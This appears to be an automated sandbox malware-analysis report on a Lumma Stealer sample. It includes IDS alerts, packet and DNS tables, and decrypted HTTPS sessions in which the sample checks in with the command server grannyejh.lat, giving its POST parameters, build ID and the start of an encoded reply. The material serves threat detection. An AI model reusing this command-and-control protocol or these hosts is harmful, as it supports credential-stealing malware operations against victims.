                                                                                                            2024-12-18T21:17:05.699877+01002049836ET MALWARE Lumma Stealer Related Activity1192.168.2.749700172.67.179.109443TCP
                                                                                                            2024-12-18T21:17:05.699877+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.749700172.67.179.109443TCP
                                                                                                            2024-12-18T21:17:06.952490+01002058365ET MALWARE Observed Win32/Lumma Stealer Related Domain (grannyejh .lat in TLS SNI)1192.168.2.749702172.67.179.109443TCP
                                                                                                            2024-12-18T21:17:06.952490+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.749702172.67.179.109443TCP
                                                                                                            2024-12-18T21:17:12.833580+01002049812ET MALWARE Lumma Stealer Related Activity M21192.168.2.749702172.67.179.109443TCP
                                                                                                            2024-12-18T21:17:12.833580+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.749702172.67.179.109443TCP
                                                                                                            2024-12-18T21:17:14.417710+01002058365ET MALWARE Observed Win32/Lumma Stealer Related Domain (grannyejh .lat in TLS SNI)1192.168.2.749723172.67.179.109443TCP
                                                                                                            2024-12-18T21:17:14.417710+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.749723172.67.179.109443TCP
                                                                                                            2024-12-18T21:17:17.614166+01002048094ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration1192.168.2.749723172.67.179.109443TCP
                                                                                                            2024-12-18T21:17:19.368228+01002058365ET MALWARE Observed Win32/Lumma Stealer Related Domain (grannyejh .lat in TLS SNI)1192.168.2.749735172.67.179.109443TCP
                                                                                                            2024-12-18T21:17:19.368228+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.749735172.67.179.109443TCP
                                                                                                            2024-12-18T21:17:25.397542+01002058365ET MALWARE Observed Win32/Lumma Stealer Related Domain (grannyejh .lat in TLS SNI)1192.168.2.749754172.67.179.109443TCP
                                                                                                            2024-12-18T21:17:25.397542+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.749754172.67.179.109443TCP
                                                                                                            2024-12-18T21:17:30.868317+01002058365ET MALWARE Observed Win32/Lumma Stealer Related Domain (grannyejh .lat in TLS SNI)1192.168.2.749765172.67.179.109443TCP
                                                                                                            2024-12-18T21:17:30.868317+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.749765172.67.179.109443TCP
                                                                                                            2024-12-18T21:17:36.349023+01002058365ET MALWARE Observed Win32/Lumma Stealer Related Domain (grannyejh .lat in TLS SNI)1192.168.2.749781172.67.179.109443TCP
                                                                                                            2024-12-18T21:17:36.349023+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.749781172.67.179.109443TCP
                                                                                                            2024-12-18T21:17:44.738101+01002058365ET MALWARE Observed Win32/Lumma Stealer Related Domain (grannyejh .lat in TLS SNI)1192.168.2.749802172.67.179.109443TCP
                                                                                                            2024-12-18T21:17:44.738101+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.749802172.67.179.109443TCP

                                                                                                            Network Port Distribution

                                                                                                            TCP Packets

                                                                                                            TimestampSource PortDest PortSource IPDest IP
                                                                                                            Dec 18, 2024 21:17:01.129168987 CET49700443192.168.2.7172.67.179.109
                                                                                                            Dec 18, 2024 21:17:01.129225969 CET44349700172.67.179.109192.168.2.7
                                                                                                            Dec 18, 2024 21:17:01.129283905 CET49700443192.168.2.7172.67.179.109
                                                                                                            Dec 18, 2024 21:17:01.158178091 CET49700443192.168.2.7172.67.179.109
                                                                                                            Dec 18, 2024 21:17:01.158217907 CET44349700172.67.179.109192.168.2.7
                                                                                                            Dec 18, 2024 21:17:02.473839998 CET44349700172.67.179.109192.168.2.7
                                                                                                            Dec 18, 2024 21:17:02.473913908 CET49700443192.168.2.7172.67.179.109
                                                                                                            Dec 18, 2024 21:17:02.478216887 CET49700443192.168.2.7172.67.179.109
                                                                                                            Dec 18, 2024 21:17:02.478233099 CET44349700172.67.179.109192.168.2.7
                                                                                                            Dec 18, 2024 21:17:02.478511095 CET44349700172.67.179.109192.168.2.7
                                                                                                            Dec 18, 2024 21:17:02.518313885 CET49700443192.168.2.7172.67.179.109
                                                                                                            Dec 18, 2024 21:17:02.571743965 CET49700443192.168.2.7172.67.179.109
                                                                                                            Dec 18, 2024 21:17:02.571779966 CET49700443192.168.2.7172.67.179.109
                                                                                                            Dec 18, 2024 21:17:02.571930885 CET44349700172.67.179.109192.168.2.7
                                                                                                            Dec 18, 2024 21:17:05.699903965 CET44349700172.67.179.109192.168.2.7
                                                                                                            Dec 18, 2024 21:17:05.700011969 CET44349700172.67.179.109192.168.2.7
                                                                                                            Dec 18, 2024 21:17:05.700267076 CET49700443192.168.2.7172.67.179.109
                                                                                                            Dec 18, 2024 21:17:05.702126026 CET49700443192.168.2.7172.67.179.109
                                                                                                            Dec 18, 2024 21:17:05.702147961 CET44349700172.67.179.109192.168.2.7
                                                                                                            Dec 18, 2024 21:17:05.711177111 CET49702443192.168.2.7172.67.179.109
                                                                                                            Dec 18, 2024 21:17:05.711206913 CET44349702172.67.179.109192.168.2.7
                                                                                                            Dec 18, 2024 21:17:05.711287022 CET49702443192.168.2.7172.67.179.109
                                                                                                            Dec 18, 2024 21:17:05.711576939 CET49702443192.168.2.7172.67.179.109
                                                                                                            Dec 18, 2024 21:17:05.711591005 CET44349702172.67.179.109192.168.2.7
                                                                                                            Dec 18, 2024 21:17:06.952418089 CET44349702172.67.179.109192.168.2.7
                                                                                                            Dec 18, 2024 21:17:06.952490091 CET49702443192.168.2.7172.67.179.109
                                                                                                            Dec 18, 2024 21:17:06.996897936 CET49702443192.168.2.7172.67.179.109
                                                                                                            Dec 18, 2024 21:17:06.996917009 CET44349702172.67.179.109192.168.2.7
                                                                                                            Dec 18, 2024 21:17:06.997253895 CET44349702172.67.179.109192.168.2.7
                                                                                                            Dec 18, 2024 21:17:07.017692089 CET49702443192.168.2.7172.67.179.109
                                                                                                            Dec 18, 2024 21:17:07.017710924 CET49702443192.168.2.7172.67.179.109
                                                                                                            Dec 18, 2024 21:17:07.017786026 CET44349702172.67.179.109192.168.2.7
                                                                                                            Dec 18, 2024 21:17:12.833542109 CET44349702172.67.179.109192.168.2.7
                                                                                                            Dec 18, 2024 21:17:12.833580017 CET44349702172.67.179.109192.168.2.7
                                                                                                            Dec 18, 2024 21:17:12.833617926 CET44349702172.67.179.109192.168.2.7
                                                                                                            Dec 18, 2024 21:17:12.833630085 CET44349702172.67.179.109192.168.2.7
                                                                                                            Dec 18, 2024 21:17:12.833642960 CET49702443192.168.2.7172.67.179.109
                                                                                                            Dec 18, 2024 21:17:12.833657980 CET44349702172.67.179.109192.168.2.7
                                                                                                            Dec 18, 2024 21:17:12.833677053 CET44349702172.67.179.109192.168.2.7
                                                                                                            Dec 18, 2024 21:17:12.833692074 CET49702443192.168.2.7172.67.179.109
                                                                                                            Dec 18, 2024 21:17:12.833719015 CET49702443192.168.2.7172.67.179.109
                                                                                                            Dec 18, 2024 21:17:12.833726883 CET44349702172.67.179.109192.168.2.7
                                                                                                            Dec 18, 2024 21:17:12.840617895 CET44349702172.67.179.109192.168.2.7
                                                                                                            Dec 18, 2024 21:17:12.840692043 CET49702443192.168.2.7172.67.179.109
                                                                                                            Dec 18, 2024 21:17:12.840701103 CET44349702172.67.179.109192.168.2.7
                                                                                                            Dec 18, 2024 21:17:12.848973036 CET44349702172.67.179.109192.168.2.7
                                                                                                            Dec 18, 2024 21:17:12.849050045 CET49702443192.168.2.7172.67.179.109
                                                                                                            Dec 18, 2024 21:17:12.849060059 CET44349702172.67.179.109192.168.2.7
                                                                                                            Dec 18, 2024 21:17:12.893412113 CET49702443192.168.2.7172.67.179.109
                                                                                                            Dec 18, 2024 21:17:12.893419027 CET44349702172.67.179.109192.168.2.7
                                                                                                            Dec 18, 2024 21:17:12.940291882 CET49702443192.168.2.7172.67.179.109
                                                                                                            Dec 18, 2024 21:17:12.953397036 CET44349702172.67.179.109192.168.2.7
                                                                                                            Dec 18, 2024 21:17:13.002804995 CET49702443192.168.2.7172.67.179.109
                                                                                                            Dec 18, 2024 21:17:13.025302887 CET44349702172.67.179.109192.168.2.7
                                                                                                            Dec 18, 2024 21:17:13.029535055 CET44349702172.67.179.109192.168.2.7
                                                                                                            Dec 18, 2024 21:17:13.029643059 CET49702443192.168.2.7172.67.179.109
                                                                                                            Dec 18, 2024 21:17:13.029650927 CET44349702172.67.179.109192.168.2.7
                                                                                                            Dec 18, 2024 21:17:13.029726982 CET49702443192.168.2.7172.67.179.109
                                                                                                            Dec 18, 2024 21:17:13.029859066 CET49702443192.168.2.7172.67.179.109
                                                                                                            Dec 18, 2024 21:17:13.029870987 CET44349702172.67.179.109192.168.2.7
                                                                                                            Dec 18, 2024 21:17:13.029880047 CET49702443192.168.2.7172.67.179.109
                                                                                                            Dec 18, 2024 21:17:13.029884100 CET44349702172.67.179.109192.168.2.7
                                                                                                            Dec 18, 2024 21:17:13.198458910 CET49723443192.168.2.7172.67.179.109
                                                                                                            Dec 18, 2024 21:17:13.198499918 CET44349723172.67.179.109192.168.2.7
                                                                                                            Dec 18, 2024 21:17:13.198592901 CET49723443192.168.2.7172.67.179.109
                                                                                                            Dec 18, 2024 21:17:13.198983908 CET49723443192.168.2.7172.67.179.109
                                                                                                            Dec 18, 2024 21:17:13.198997021 CET44349723172.67.179.109192.168.2.7
                                                                                                            Dec 18, 2024 21:17:14.417534113 CET44349723172.67.179.109192.168.2.7
                                                                                                            Dec 18, 2024 21:17:14.417710066 CET49723443192.168.2.7172.67.179.109
                                                                                                            Dec 18, 2024 21:17:14.419015884 CET49723443192.168.2.7172.67.179.109
                                                                                                            Dec 18, 2024 21:17:14.419028044 CET44349723172.67.179.109192.168.2.7
                                                                                                            Dec 18, 2024 21:17:14.419279099 CET44349723172.67.179.109192.168.2.7
                                                                                                            Dec 18, 2024 21:17:14.420600891 CET49723443192.168.2.7172.67.179.109
                                                                                                            Dec 18, 2024 21:17:14.420716047 CET49723443192.168.2.7172.67.179.109
                                                                                                            Dec 18, 2024 21:17:14.420748949 CET44349723172.67.179.109192.168.2.7
                                                                                                            Dec 18, 2024 21:17:17.614136934 CET44349723172.67.179.109192.168.2.7
                                                                                                            Dec 18, 2024 21:17:17.614233017 CET44349723172.67.179.109192.168.2.7
                                                                                                            Dec 18, 2024 21:17:17.614346981 CET49723443192.168.2.7172.67.179.109
                                                                                                            Dec 18, 2024 21:17:17.614512920 CET49723443192.168.2.7172.67.179.109
                                                                                                            Dec 18, 2024 21:17:17.614552975 CET44349723172.67.179.109192.168.2.7
                                                                                                            Dec 18, 2024 21:17:18.134344101 CET49735443192.168.2.7172.67.179.109
                                                                                                            Dec 18, 2024 21:17:18.134372950 CET44349735172.67.179.109192.168.2.7
                                                                                                            Dec 18, 2024 21:17:18.134486914 CET49735443192.168.2.7172.67.179.109
                                                                                                            Dec 18, 2024 21:17:18.134828091 CET49735443192.168.2.7172.67.179.109
                                                                                                            Dec 18, 2024 21:17:18.134839058 CET44349735172.67.179.109192.168.2.7
                                                                                                            Dec 18, 2024 21:17:19.368026972 CET44349735172.67.179.109192.168.2.7
                                                                                                            Dec 18, 2024 21:17:19.368227959 CET49735443192.168.2.7172.67.179.109
                                                                                                            Dec 18, 2024 21:17:19.369345903 CET49735443192.168.2.7172.67.179.109
                                                                                                            Dec 18, 2024 21:17:19.369364023 CET44349735172.67.179.109192.168.2.7
                                                                                                            Dec 18, 2024 21:17:19.369631052 CET44349735172.67.179.109192.168.2.7
                                                                                                            Dec 18, 2024 21:17:19.370811939 CET49735443192.168.2.7172.67.179.109
                                                                                                            Dec 18, 2024 21:17:19.370992899 CET49735443192.168.2.7172.67.179.109
                                                                                                            Dec 18, 2024 21:17:19.371026993 CET44349735172.67.179.109192.168.2.7
                                                                                                            Dec 18, 2024 21:17:19.373413086 CET49735443192.168.2.7172.67.179.109
                                                                                                            Dec 18, 2024 21:17:19.419338942 CET44349735172.67.179.109192.168.2.7
                                                                                                            Dec 18, 2024 21:17:23.955187082 CET44349735172.67.179.109192.168.2.7
                                                                                                            Dec 18, 2024 21:17:23.955291986 CET44349735172.67.179.109192.168.2.7
                                                                                                            Dec 18, 2024 21:17:23.955391884 CET49735443192.168.2.7172.67.179.109
                                                                                                            Dec 18, 2024 21:17:23.955477953 CET49735443192.168.2.7172.67.179.109
                                                                                                            Dec 18, 2024 21:17:23.955498934 CET44349735172.67.179.109192.168.2.7
                                                                                                            Dec 18, 2024 21:17:24.180882931 CET49754443192.168.2.7172.67.179.109
                                                                                                            Dec 18, 2024 21:17:24.180938005 CET44349754172.67.179.109192.168.2.7
                                                                                                            Dec 18, 2024 21:17:24.181011915 CET49754443192.168.2.7172.67.179.109
                                                                                                            Dec 18, 2024 21:17:24.181297064 CET49754443192.168.2.7172.67.179.109
                                                                                                            Dec 18, 2024 21:17:24.181318998 CET44349754172.67.179.109192.168.2.7
                                                                                                            Dec 18, 2024 21:17:25.397434950 CET44349754172.67.179.109192.168.2.7
                                                                                                            Dec 18, 2024 21:17:25.397542000 CET49754443192.168.2.7172.67.179.109
                                                                                                            Dec 18, 2024 21:17:25.400211096 CET49754443192.168.2.7172.67.179.109
                                                                                                            Dec 18, 2024 21:17:25.400221109 CET44349754172.67.179.109192.168.2.7
                                                                                                            Dec 18, 2024 21:17:25.400477886 CET44349754172.67.179.109192.168.2.7
                                                                                                            Dec 18, 2024 21:17:25.408830881 CET49754443192.168.2.7172.67.179.109
                                                                                                            Dec 18, 2024 21:17:25.408942938 CET49754443192.168.2.7172.67.179.109
                                                                                                            Dec 18, 2024 21:17:25.408978939 CET44349754172.67.179.109192.168.2.7
                                                                                                            Dec 18, 2024 21:17:25.409044027 CET49754443192.168.2.7172.67.179.109
                                                                                                            Dec 18, 2024 21:17:25.409054041 CET44349754172.67.179.109192.168.2.7
                                                                                                            Dec 18, 2024 21:17:29.321449995 CET44349754172.67.179.109192.168.2.7
                                                                                                            Dec 18, 2024 21:17:29.321727991 CET44349754172.67.179.109192.168.2.7
                                                                                                            Dec 18, 2024 21:17:29.321769953 CET49754443192.168.2.7172.67.179.109
                                                                                                            Dec 18, 2024 21:17:29.321793079 CET49754443192.168.2.7172.67.179.109
                                                                                                            Dec 18, 2024 21:17:29.629468918 CET49765443192.168.2.7172.67.179.109
                                                                                                            Dec 18, 2024 21:17:29.629503012 CET44349765172.67.179.109192.168.2.7
                                                                                                            Dec 18, 2024 21:17:29.629571915 CET49765443192.168.2.7172.67.179.109
                                                                                                            Dec 18, 2024 21:17:29.629870892 CET49765443192.168.2.7172.67.179.109
                                                                                                            Dec 18, 2024 21:17:29.629883051 CET44349765172.67.179.109192.168.2.7
                                                                                                            Dec 18, 2024 21:17:30.868172884 CET44349765172.67.179.109192.168.2.7
                                                                                                            Dec 18, 2024 21:17:30.868316889 CET49765443192.168.2.7172.67.179.109
                                                                                                            Dec 18, 2024 21:17:30.869710922 CET49765443192.168.2.7172.67.179.109
                                                                                                            Dec 18, 2024 21:17:30.869718075 CET44349765172.67.179.109192.168.2.7
                                                                                                            Dec 18, 2024 21:17:30.870062113 CET44349765172.67.179.109192.168.2.7
                                                                                                            Dec 18, 2024 21:17:30.871454000 CET49765443192.168.2.7172.67.179.109
                                                                                                            Dec 18, 2024 21:17:30.871576071 CET49765443192.168.2.7172.67.179.109
                                                                                                            Dec 18, 2024 21:17:30.871581078 CET44349765172.67.179.109192.168.2.7
                                                                                                            Dec 18, 2024 21:17:34.691278934 CET44349765172.67.179.109192.168.2.7
                                                                                                            Dec 18, 2024 21:17:34.691494942 CET49765443192.168.2.7172.67.179.109
                                                                                                            Dec 18, 2024 21:17:34.691519022 CET44349765172.67.179.109192.168.2.7
                                                                                                            Dec 18, 2024 21:17:34.691571951 CET49765443192.168.2.7172.67.179.109
                                                                                                            Dec 18, 2024 21:17:35.127744913 CET49781443192.168.2.7172.67.179.109
                                                                                                            Dec 18, 2024 21:17:35.127784014 CET44349781172.67.179.109192.168.2.7
                                                                                                            Dec 18, 2024 21:17:35.127871990 CET49781443192.168.2.7172.67.179.109
                                                                                                            Dec 18, 2024 21:17:35.128267050 CET49781443192.168.2.7172.67.179.109
                                                                                                            Dec 18, 2024 21:17:35.128281116 CET44349781172.67.179.109192.168.2.7
                                                                                                            Dec 18, 2024 21:17:36.348922968 CET44349781172.67.179.109192.168.2.7
                                                                                                            Dec 18, 2024 21:17:36.349023104 CET49781443192.168.2.7172.67.179.109
                                                                                                            Dec 18, 2024 21:17:36.350234985 CET49781443192.168.2.7172.67.179.109
                                                                                                            Dec 18, 2024 21:17:36.350243092 CET44349781172.67.179.109192.168.2.7
                                                                                                            Dec 18, 2024 21:17:36.350471973 CET44349781172.67.179.109192.168.2.7
                                                                                                            Dec 18, 2024 21:17:36.354610920 CET49781443192.168.2.7172.67.179.109
                                                                                                            Dec 18, 2024 21:17:36.355267048 CET49781443192.168.2.7172.67.179.109
                                                                                                            Dec 18, 2024 21:17:36.355298996 CET44349781172.67.179.109192.168.2.7
                                                                                                            Dec 18, 2024 21:17:36.355623960 CET49781443192.168.2.7172.67.179.109
                                                                                                            Dec 18, 2024 21:17:36.355655909 CET44349781172.67.179.109192.168.2.7
                                                                                                            Dec 18, 2024 21:17:36.356777906 CET49781443192.168.2.7172.67.179.109
                                                                                                            Dec 18, 2024 21:17:36.356815100 CET44349781172.67.179.109192.168.2.7
                                                                                                            Dec 18, 2024 21:17:36.356926918 CET49781443192.168.2.7172.67.179.109
                                                                                                            Dec 18, 2024 21:17:36.356965065 CET44349781172.67.179.109192.168.2.7
                                                                                                            Dec 18, 2024 21:17:36.357079983 CET49781443192.168.2.7172.67.179.109
                                                                                                            Dec 18, 2024 21:17:36.357110977 CET44349781172.67.179.109192.168.2.7
                                                                                                            Dec 18, 2024 21:17:36.357239962 CET49781443192.168.2.7172.67.179.109
                                                                                                            Dec 18, 2024 21:17:36.357256889 CET44349781172.67.179.109192.168.2.7
                                                                                                            Dec 18, 2024 21:17:36.357264996 CET49781443192.168.2.7172.67.179.109
                                                                                                            Dec 18, 2024 21:17:36.357278109 CET44349781172.67.179.109192.168.2.7
                                                                                                            Dec 18, 2024 21:17:36.357388973 CET49781443192.168.2.7172.67.179.109
                                                                                                            Dec 18, 2024 21:17:36.357414007 CET44349781172.67.179.109192.168.2.7
                                                                                                            Dec 18, 2024 21:17:36.357429981 CET49781443192.168.2.7172.67.179.109
                                                                                                            Dec 18, 2024 21:17:36.357522964 CET49781443192.168.2.7172.67.179.109
                                                                                                            Dec 18, 2024 21:17:36.357549906 CET49781443192.168.2.7172.67.179.109
                                                                                                            Dec 18, 2024 21:17:36.399333000 CET44349781172.67.179.109192.168.2.7
                                                                                                            Dec 18, 2024 21:17:36.399487972 CET49781443192.168.2.7172.67.179.109
                                                                                                            Dec 18, 2024 21:17:36.399517059 CET44349781172.67.179.109192.168.2.7
                                                                                                            Dec 18, 2024 21:17:36.399540901 CET49781443192.168.2.7172.67.179.109
                                                                                                            Dec 18, 2024 21:17:36.399560928 CET44349781172.67.179.109192.168.2.7
                                                                                                            Dec 18, 2024 21:17:36.399580956 CET49781443192.168.2.7172.67.179.109
                                                                                                            Dec 18, 2024 21:17:36.399594069 CET44349781172.67.179.109192.168.2.7
                                                                                                            Dec 18, 2024 21:17:44.253057003 CET44349781172.67.179.109192.168.2.7
                                                                                                            Dec 18, 2024 21:17:44.253156900 CET44349781172.67.179.109192.168.2.7
                                                                                                            Dec 18, 2024 21:17:44.253197908 CET49781443192.168.2.7172.67.179.109
                                                                                                            Dec 18, 2024 21:17:44.253643036 CET49781443192.168.2.7172.67.179.109
                                                                                                            Dec 18, 2024 21:17:44.253659964 CET44349781172.67.179.109192.168.2.7
                                                                                                            Dec 18, 2024 21:17:44.262614012 CET49802443192.168.2.7172.67.179.109
                                                                                                            Dec 18, 2024 21:17:44.262648106 CET44349802172.67.179.109192.168.2.7
                                                                                                            Dec 18, 2024 21:17:44.262734890 CET49802443192.168.2.7172.67.179.109
                                                                                                            Dec 18, 2024 21:17:44.263021946 CET49802443192.168.2.7172.67.179.109
                                                                                                            Dec 18, 2024 21:17:44.263031960 CET44349802172.67.179.109192.168.2.7
                                                                                                            Dec 18, 2024 21:17:44.738101006 CET49802443192.168.2.7172.67.179.109

                                                                                                            UDP Packets

                                                                                                            TimestampSource PortDest PortSource IPDest IP
                                                                                                            Dec 18, 2024 21:17:00.797971964 CET6474953192.168.2.71.1.1.1
                                                                                                            Dec 18, 2024 21:17:00.935585976 CET53647491.1.1.1192.168.2.7
                                                                                                            Dec 18, 2024 21:17:00.944390059 CET6461953192.168.2.71.1.1.1
                                                                                                            Dec 18, 2024 21:17:01.084244967 CET53646191.1.1.1192.168.2.7

                                                                                                            DNS Queries

                                                                                                            TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                            Dec 18, 2024 21:17:00.797971964 CET192.168.2.71.1.1.10x34f6Standard query (0)sweepyribs.latA (IP address)IN (0x0001)false
                                                                                                            Dec 18, 2024 21:17:00.944390059 CET192.168.2.71.1.1.10x4664Standard query (0)grannyejh.latA (IP address)IN (0x0001)false

                                                                                                            DNS Answers

                                                                                                            TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                            Dec 18, 2024 21:17:00.935585976 CET1.1.1.1192.168.2.70x34f6Name error (3)sweepyribs.latnonenoneA (IP address)IN (0x0001)false
                                                                                                            Dec 18, 2024 21:17:01.084244967 CET1.1.1.1192.168.2.70x4664No error (0)grannyejh.lat172.67.179.109A (IP address)IN (0x0001)false
                                                                                                            Dec 18, 2024 21:17:01.084244967 CET1.1.1.1192.168.2.70x4664No error (0)grannyejh.lat104.21.64.80A (IP address)IN (0x0001)false

                                                                                                            HTTP Request Dependency Graph

                                                                                                            • grannyejh.lat

                                                                                                            HTTPS Proxied Packets

                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            0192.168.2.749700172.67.179.1094437392C:\Users\user\Desktop\pPizCGDvrx.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            2024-12-18 20:17:02 UTC260OUTPOST /api HTTP/1.1
                                                                                                            Connection: Keep-Alive
                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                            Content-Length: 8
                                                                                                            Host: grannyejh.lat
                                                                                                            2024-12-18 20:17:02 UTC8OUTData Raw: 61 63 74 3d 6c 69 66 65
                                                                                                            Data Ascii: act=life
                                                                                                            2024-12-18 20:17:05 UTC1029INHTTP/1.1 200 OK
                                                                                                            Date: Wed, 18 Dec 2024 20:17:05 GMT
                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                            Transfer-Encoding: chunked
                                                                                                            Connection: close
                                                                                                            Set-Cookie: PHPSESSID=2cc8p0e5jjg5q00jth0v436pkt; expires=Sun, 13-Apr-2025 14:03:42 GMT; Max-Age=9999999; path=/
                                                                                                            Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                            Cache-Control: no-store, no-cache, must-revalidate
                                                                                                            Pragma: no-cache
                                                                                                            cf-cache-status: DYNAMIC
                                                                                                            vary: accept-encoding
                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=0LTY6TpchHDXn1eoSB%2Fp5ETrCYHua7MWhNI2o89i0e6L1MVU43ESuVbgAwyIllac89abXv%2F1JNT9e%2FhknCDbMC2cHesEtGZDEhxK%2FiRO3TGG3Eehpz6QKXhtamiAfKI5"}],"group":"cf-nel","max_age":604800}
                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                            Server: cloudflare
                                                                                                            CF-RAY: 8f41d5882a654375-EWR
                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1716&min_rtt=1716&rtt_var=858&sent=7&recv=8&lost=0&retrans=1&sent_bytes=4200&recv_bytes=904&delivery_rate=59424&cwnd=226&unsent_bytes=0&cid=2b956e0f342bc4f7&ts=3288&x=0"
                                                                                                            2024-12-18 20:17:05 UTC7INData Raw: 32 0d 0a 6f 6b 0d 0a
                                                                                                            Data Ascii: 2ok
                                                                                                            2024-12-18 20:17:05 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                            Data Ascii: 0


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            1192.168.2.749702172.67.179.1094437392C:\Users\user\Desktop\pPizCGDvrx.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            2024-12-18 20:17:07 UTC261OUTPOST /api HTTP/1.1
                                                                                                            Connection: Keep-Alive
                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                            Content-Length: 47
                                                                                                            Host: grannyejh.lat
                                                                                                            2024-12-18 20:17:07 UTC47OUTData Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 50 73 46 4b 44 67 2d 2d 70 61 62 6c 6f 26 6a 3d
                                                                                                            Data Ascii: act=recive_message&ver=4.0&lid=PsFKDg--pablo&j=
                                                                                                            2024-12-18 20:17:12 UTC1027INHTTP/1.1 200 OK
                                                                                                            Date: Wed, 18 Dec 2024 20:17:12 GMT
                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                            Transfer-Encoding: chunked
                                                                                                            Connection: close
                                                                                                            Set-Cookie: PHPSESSID=9p5ihud7j3ci55cqgneehe1irf; expires=Sun, 13-Apr-2025 14:03:47 GMT; Max-Age=9999999; path=/
                                                                                                            Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                            Cache-Control: no-store, no-cache, must-revalidate
                                                                                                            Pragma: no-cache
                                                                                                            cf-cache-status: DYNAMIC
                                                                                                            vary: accept-encoding
                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=bEAtobyNQAzPgjjfNvQZPD0Vm3hc8NV5tdCuZZ3g0ScLjWYqBIV0odFJJcaFuQZwO2R%2BVMW2IUuv95kQIvW3i8idcFw70AeIWOjuk1nP61innm%2F6sTeDOiPVBTcCER4V"}],"group":"cf-nel","max_age":604800}
                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                            Server: cloudflare
                                                                                                            CF-RAY: 8f41d5a51b9f5e71-EWR
                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1730&min_rtt=1724&rtt_var=658&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2829&recv_bytes=944&delivery_rate=1647855&cwnd=238&unsent_bytes=0&cid=0705a8d904a975e6&ts=5913&x=0"
                                                                                                            2024-12-18 20:17:12 UTC342INData Raw: 33 65 37 35 0d 0a 6d 75 53 70 4a 72 52 33 6e 45 68 72 6c 38 64 4d 44 4e 4b 77 4a 37 36 36 64 70 69 6b 30 4e 73 50 45 34 44 45 33 4c 4d 44 73 41 44 68 78 74 38 45 6a 6b 4f 77 61 68 6a 79 35 58 5a 34 6f 4d 56 43 6b 70 67 58 2f 49 62 71 76 57 35 2f 38 36 48 77 6b 58 58 64 49 71 43 43 79 45 72 48 45 72 42 71 44 75 2f 6c 64 6c 65 70 6b 6b 4c 51 6d 45 79 36 77 62 71 35 62 6e 2f 69 70 62 66 63 63 39 78 6a 38 6f 6a 4f 54 74 45 55 2b 43 6b 48 2b 71 49 70 61 62 50 61 53 64 66 58 48 76 57 47 2f 50 6c 71 61 61 4c 2b 2f 76 35 6d 78 47 48 58 68 64 70 4e 6c 67 71 77 4d 30 6e 79 71 57 34 32 38 4e 46 43 33 4e 59 51 2f 4d 2b 34 73 32 64 33 34 36 43 32 77 32 72 57 61 50 4b 47 7a 55 2f 62 48 65 77 6b 44 66 32 70 4c 32 4f 7a 6b 67 75 63 33 77 79 36 6e 76 4c 71 58 33 4c 7a 74
                                                                                                            Data Ascii: 3e75muSpJrR3nEhrl8dMDNKwJ766dpik0NsPE4DE3LMDsADhxt8EjkOwahjy5XZ4oMVCkpgX/IbqvW5/86HwkXXdIqCCyErHErBqDu/ldlepkkLQmEy6wbq5bn/ipbfcc9xj8ojOTtEU+CkH+qIpabPaSdfXHvWG/PlqaaL+/v5mxGHXhdpNlgqwM0nyqW428NFC3NYQ/M+4s2d346C2w2rWaPKGzU/bHewkDf2pL2Ozkguc3wy6nvLqX3Lzt
